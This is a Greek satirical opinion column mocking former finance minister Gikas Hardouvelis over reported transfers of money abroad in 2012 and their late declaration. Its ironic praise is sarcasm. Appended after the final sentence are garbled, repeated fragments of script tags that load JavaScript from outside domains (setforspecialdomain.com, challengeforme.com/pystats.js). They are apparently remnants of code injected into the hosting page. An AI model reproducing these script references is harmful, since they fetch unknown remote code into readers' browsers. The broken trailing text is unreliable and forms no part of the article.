Ντροπή σε όλους σας! Του Αλέξανδρου Κανδρή

Το 2012 συμβούλευε τους Έλληνες να μην βγάζουν λεφτά στο εξωτερικό. Την ίδια χρονιά, αποφάσισε να παρακούσει τον εαυτό του, να κάνει την προσωπική του επανάσταση και να βγάλει τα λεφτά του στο εξωτερικό…

Φυσικά, αναφέρομαι στον πρώην Υπουργό Οικονομικών, κύριο Γκίκα Χαρδούβελη. Ο οποίος, σύμφωνα με δημοσίευμα εφημερίδας, όντας υπεύθυνος του οικονομικού γραφείου του τέως πρωθυπουργού Λουκά Παπαδήμου, έβγαλε στο εξωτερικό χρήματα αξίας περίπου 500.000 ευρώ.

Μάλιστα, σύμφωνα με το δημοσίευμα, το χρονικό διάστημα μεταξύ 5 Μαΐου και 14 Ιουνίου του 2012 πραγματοποίησε προς το εξωτερικό 56 μεταφορές κεφαλαίων αξίας από 7.700 έως 9.800 δολάρια τη φορά. Και όλα αυτά για να μπορεί να συντηρήσει τα παιδιά του, όπως δικαιολογείται ο ίδιος.

Υπήρχε όμως και άλλος ένας λόγος. Αυτός που κανένας δεν μπόρεσε να καταλάβει: Ο κ. Χαρδούβελης, με αυτήν του την κίνηση, έκλεισε το μάτι σε όλους τους Έλληνες για να ακολουθήσουν το παράδειγμά του, να βγάλουν δηλαδή τα χρήματά τους στο εξωτερικό ώστε να χτυπήσουν το Κεφάλαιο, να οδηγήσουν τις Ελληνικές τράπεζες στην κατάρρευση, ανοίγοντας τον δρόμο για τον κομμουνισμό.

Δυστυχώς, δεν τα κατάφερε! Αλλά δεν φταίει αυτός… Οι φοβιτσιάρηδες οι Έλληνες φταίνε.

Πάμε όμως και στην ουσία; Από όσα προκύπτουν από το έγγραφο τα ποσά αυτά το 2012 που μεταφέρθηκαν ήταν αδήλωτα στον Πόθεν Έσχες μέχρι το 2014 που τα δήλωσε! Για δύο χρονάκια δηλαδή! Και τι έγινε ρε παιδιά; Ο Ανθρωπος και Πατριώτης (με Α και Π κεφαλαία), αναγνώρισε το στιγμιαίο λάθος του, είδε τις μεγάλες αλλαγές που έγιναν προς το καλύτερο στην Ελλάδα και έφερε τα χρήματά του πίσω για να φορολογηθεί κανονικά. Και με πρόστιμο! Και γι αυτό, του αξίζουν μπράβο.

Και όχι, μην σκέφτεστε ότι ο άνθρωπος που ήταν υπεύθυνος για τις διαπραγματεύσεις με την Τρόικα είχε βγάλει τα χρήματά του στο εξωτερικό… Ο Άνθρωπος και Πατριώτης Γκίκας Χαρδούβελης, ήθελε να μην επηρεάζεται από προσωπικά συμφέροντα και να είναι απερίσπαστος στις διαπραγματεύσεις.

Τέλος, δεν είναι τυχαίο που ο ΣΥΡΙΖΑ κατηγορεί τον Άνθρωπο και Πατριώτη Γκίκα Χαρδούβελη ότι μετέφερε τα χρήματά του στη νήσο Jersey -που ανήκει στην Βρετανία αλλά αποτελεί φορολογικό παράδεισο- αφού είναι γνωστό πως όλοι οι Συριζαίοι είναι άθεοι και δεν πιστεύουν ούτε σε Θεούς, ούτε σε δαίμονες, ούτε φυσικά σε παραδείσους.

Ντροπή σε όσους σπιλώνουν ονόματα και υπολήψεις! Ντροπή σε όσους δεν πιστεύουν ότι ένας Άνθρωπος δεν μπορεί να φοβηθεί και να έχει μια στιγμή αδυναμίας. Ντροπή σε όσους πιστεύουν ότι ένας Άνθρωπος και Πατριώτης μπορεί να ντροπιάσει το αδιάφθορο, δίκαιο και εξαιρετικό πολιτικό σύστημα της Ελλάδας!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >